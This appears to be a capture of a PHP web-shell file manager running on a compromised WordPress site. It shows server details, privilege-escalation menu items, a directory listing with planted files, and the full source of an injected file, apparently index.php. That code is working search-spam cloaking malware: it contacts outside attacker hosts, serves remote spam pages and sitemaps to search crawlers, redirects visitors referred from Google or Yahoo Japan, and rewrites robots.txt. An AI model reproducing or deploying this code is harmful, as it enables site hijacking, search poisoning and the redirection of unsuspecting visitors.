Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 18.117.145.188
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
sacerdotessa-mariapollero.pro /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb
[ DIR ]
drwxrwxrwx
2024-12-27 13:14
.well-known
[ DIR ]
drwxr-xr-x
2024-12-04 14:50
cgi-bin
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
fix
[ DIR ]
drwxr-xr-x
2025-04-27 14:37
fixik
[ DIR ]
drwxr-xr-x
2025-04-27 14:37
wp-admin
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
wp-content
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
wp-includes
[ DIR ]
drwxr-xr-x
2025-04-24 06:32
.htaccess
564
B
-r--r--r--
2025-04-24 06:32
.htaccess.bk
564
B
-rw-r--r--
2025-04-28 20:43
.user.ini
115
B
-rw-r--r--
2025-04-28 07:20
error_log
42.86
KB
-rw-r--r--
2025-04-25 12:29
header.php
6.96
KB
-rw-r--r--
2025-02-15 05:53
index.php
12.53
KB
-r--r--r--
2025-04-24 06:32
license.txt
19.45
KB
-rw-r--r--
2024-01-01 05:02
readme.html
7.24
KB
-rw-r--r--
2024-06-18 15:59
wp-activate.php
7.21
KB
-rw-r--r--
2024-02-13 19:19
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-06-14 18:11
wp-config-sample.php
3.26
KB
-rw-r--r--
2024-10-15 19:24
wp-config.php
3.52
KB
-rw-r--r--
2025-04-29 01:41
wp-confiq.php
92.04
KB
-rw-r--r--
2025-04-24 01:45
wp-cron.php
8.22
KB
-rw-r--r--
2025-04-22 01:18
wp-links-opml.php
2.44
KB
-rw-r--r--
2022-11-27 02:01
wp-load.php
3.84
KB
-rw-r--r--
2025-04-05 18:52
wp-login.php
50.16
KB
-rw-r--r--
2024-09-30 23:12
wp-mail.php
8.34
KB
-rw-r--r--
2024-09-19 02:37
wp-settings.php
28.68
KB
-rw-r--r--
2025-04-05 18:51
wp-signup.php
33.58
KB
-rw-r--r--
2023-06-19 22:27
wp-trackback.php
4.98
KB
-rw-r--r--
2024-10-18 19:56
xinder.php
5.08
KB
-rw-r--r--
2025-04-28 07:20
xmlrpc.php
3.17
KB
-rw-r--r--
2024-03-02 18:49
Save
Rename
<?php $req_uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; $self = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : ''; $a = 'http://z50331_7.onmyown.fun/'; if(strstr($req_uri, 'wlkjfoqicr.php')){ $a = 'http://z50329_7.onmyown.fun/'; $self = '/wlkjfoqicr.php'; }elseif(strstr($req_uri, 'pp.php')){ $a = 'http://107.150.46.82/'; $self = '/pp.php'; } function curl_get_contents($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()){ $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if(0 !== $errorCode){ return false; } return $output; } function is_crawler($agent){ $agent_check = false; $bots='googlebot|google|yahoo|bing|aol'; if($agent){ if(preg_match("/($bots)/si", $agent)){ $agent_check = true; } } return $agent_check; } function check_refer($refer){ $check_refer = false; $referbots = 'google.co.jp|yahoo.co.jp|google.com'; if($refer){ if(preg_match("/($referbots)/si", $refer)){ $check_refer=true; } } return $check_refer; } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $domain = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''; $ser_name = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : ''; $req_url = $http.$domain.$req_uri; $indata1 = $a."/indata.php"; $map1 = $a."/map.php"; $jump1 = $a."/jump.php"; $url_words = $a."/words.php"; $url_robots = $a."/robots.php"; if(strpos($req_uri, ".php")){ $href1 = $http.$domain.$self; }else{ $href1 = $http.$domain; } $data1 = array(); $data1['domain'] = $domain; $data1['req_uri'] = $req_uri; $data1['href'] = $href1; $data1['req_url'] = $req_url; if(substr($req_uri, -6) == 'robots'){ define('BASE_PATH',$_SERVER['DOCUMENT_ROOT']); $robots_cont = @file_get_contents(BASE_PATH.'/robots.txt'); $data1['robots_cont'] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH.'/robots.txt', $robots_cont); $robots_cont = @file_get_contents(BASE_PATH.'/robots.txt'); if(strpos(strtolower($robots_cont), "sitemap")){ echo 'robots.txt file create success!'; }else{ echo 'robots.txt file create fail!'; } exit(); } if(substr($req_uri, -4) == '.xml'){ if(strpos($req_uri, "allsitemap.xml") || strpos($req_uri, "sitemap-index.xml") || strpos($req_uri, "sitemap-index-1.xml") || strpos($req_uri, "index.xml")){ $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit(); } if(strpos($req_uri, ".php")){ $word4 = explode("?", $req_uri); $word4 = $word4[count($word4)-1]; $word4 = str_replace(".xml", "", $word4); }else{ $word4 = str_replace("/", "", $req_uri); $word4 = str_replace(".xml", "", $word4); } $data1['word'] = $word4; $data1['action'] = 'check_sitemap'; $check_url4 = getServerCont($url_words, $data1); if($check_url4 == '1'){ $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit(); } $data1['action']="check_words"; $check1 = getServerCont($url_words, $data1); if(strpos($req_uri, "map") > 0 || $check1 == '1'){ $data1['action'] = "rand_xml"; } $check_url4 = getServerCont($url_words, $data1); header("Content-type:text/xml"); echo $check_url4; exit(); } if(strpos($req_uri, ".php")){ $main_shell = $http.$ser_name.$self; $data1['main_shell'] = $main_shell; }else{ $main_shell = $http.$ser_name; $data1['main_shell'] = $main_shell; } $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $chk_refer = check_refer($referer); $user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''); $res_crawl = is_crawler($user_agent); if(strpos($req_uri, '.php')){ $url_ext = '?'; }else{ $url_ext = '/'; } if(!$res_crawl && $chk_refer){ $lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if(preg_match('/ja/i', $lang) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".shtml",".html", ".htm"), "", $req_uri))))){ $data1['ip'] = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : ''; $data1['referer'] = $referer; $data1['user_agent'] = $user_agent; echo getServerCont($jump1, $data1); exit(); } } if($res_crawl){ $data1['http_user_agent'] = $user_agent; $ser_cont = getServerCont($indata1, $data1); echo $ser_cont;exit(); } ?>